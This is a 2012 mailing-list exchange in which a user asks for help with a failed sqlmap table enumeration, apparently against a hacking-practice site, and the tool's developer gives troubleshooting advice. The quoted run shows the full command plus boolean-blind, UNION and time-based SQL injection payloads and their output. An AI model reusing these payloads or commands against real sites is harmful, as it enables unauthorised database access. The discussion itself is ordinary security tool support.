Hi Firat.
First of all please always keep your sqlmap up to date. Current revision is
r5022 and you are running r4766.
Second, could you please explain how did you get "*OR '38'='38'"* inside
those payloads. We already have mechanisms to prevent this kind of "user
behavior" but you've obviously circumvented that somehow (--prefix or maybe
you've entered that one manually inside form search prompts). Thing is that
OR A=A is never a smart thing to do inside a SQL injection tool(s). That's
simply because OR 1=1 always results in TRUE potentially screwing user with
false results.
Third, it would be great if you could send database names you've retrieved.
It's quite possible that there are some permission problems you are
experiencing around system "mysql" database. Also, you are maybe
experiencing permission problems when accessing "information_schema"
database for retrieving identifier names.
Kind regards,
Miroslav Stampar
2012/4/27 Fırat Celal Erdik <fc.er...@gmail.com>
> Hi,
> is there anybody help me about a mysql boolean based sql injection
> exploitation with sqlmap..I found database names with sqlmap but I didnt
> find any tables from any database..I dont want to use for finding table
> names from a common table names file.. So, how can I take full table names
> with sqlmap or another tool..I tried havij but I can not find any table
> name with it ..is there any idea ?
>
> I had this error on sqlmap :
>
> *./sqlmap.py -u http://level4.hack2net.com/projects.php --forms -D mysql
> --tables*
> *
> *
> * sqlmap/1.0-dev (r4766) - automatic SQL injection and database
> takeover tool*
> * http://www.sqlmap.org*
> *
> *
> *[!] legal disclaimer: usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Authors assume no
> liability and are not responsible for any misuse or damage caused by this
> program*
> *
> *
> *[*] starting at 15:01:42*
> *
> *
> *[15:01:42] [INFO] testing connection to the target url*
> *[15:01:43] [INFO] searching for forms*
> *[15:01:43] [INFO] sqlmap got a total of 2 targets*
> *[#1] form:*
> *POST http://level4.hack2net.com:80/projects.php?form=ara*
> *POST data: kelime=&tur=1&aramayap=Ara*
> *do you want to test this form? [Y/n/q] *
> *> y*
> *Edit POST data [default: kelime=&tur=1&aramayap=Ara] (Warning: blank
> fields detected): *
> *do you want to fill blank fields with random values? [Y/n] y*
> *[15:01:50] [INFO] using '/pentest/database/sqlmap/output/
> level4.hack2net.com/session' as session file*
> *[15:01:50] [INFO] resuming injection data from session file*
> *[15:01:50] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
> *
> *[15:01:50] [INFO] using
> '/pentest/database/sqlmap/output/results-04272012_0301pm.csv' as results
> file*
> *sqlmap identified the following injection points with a total of 0
> HTTP(s) requests:*
> *---*
> *Place: POST*
> *Parameter: kelime*
> * Type: boolean-based blind*
> * Title: AND boolean-based blind - WHERE or HAVING clause*
> * Payload: kelime=38' OR '38'='38' AND 5116=5116 AND
> 'Hbnf'='Hbnf&tur=4&aramayap=Ara*
> *
> *
> * Type: UNION query*
> * Title: MySQL UNION query (NULL) - 5 columns*
> * Payload: kelime=38' OR '38'='38' UNION ALL SELECT
> CONCAT(0x3a6e656f3a,0x65594a514b5846697976,0x3a776f673a), NULL, NULL, NULL,
> NULL# AND 'ecra'='ecra&tur=4&aramayap=Ara*
> *
> *
> * Type: AND/OR time-based blind*
> * Title: MySQL > 5.0.11 AND time-based blind*
> * Payload: kelime=38' OR '38'='38' AND SLEEP(5) AND
> 'mlpI'='mlpI&tur=4&aramayap=Ara*
> *---*
> *
> *
> *do you want to exploit this SQL injection? [Y/n] y*
> *[15:01:56] [INFO] the back-end DBMS is MySQL*
> *
> *
> *web application technology: PHP 5.3.5*
> *back-end DBMS: MySQL 5.0.11*
> *[15:01:56] [INFO] fetching tables for database: mysql*
> *[15:01:56] [INFO] fetching number of tables for database 'mysql'*
> *[15:01:56] [WARNING] running in a single-thread mode. Please consider
> usage of option '--threads' for faster data retrieval*
> *[15:01:56] [INFO] retrieved: *
> *[15:01:58] [WARNING] unable to retrieve the number of tables for
> database 'mysql'*
> *[15:01:58] [ERROR] unable to retrieve the table names for any database*
> *do you want to use common table existence check? [Y/n/q] *
>
> Thanks a lot..
>
> --
> *Fırat Celal Erdik
> Security Specialist, Certified Ethical Hacker - C|EH**
> http://www.networkpentest.net*
>
>
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> sqlmap-users mailing list
> sqlmap-users@lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and
threat landscape has changed and how IT managers can respond. Discussions
will include endpoint security, mobile security and the latest in malware
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
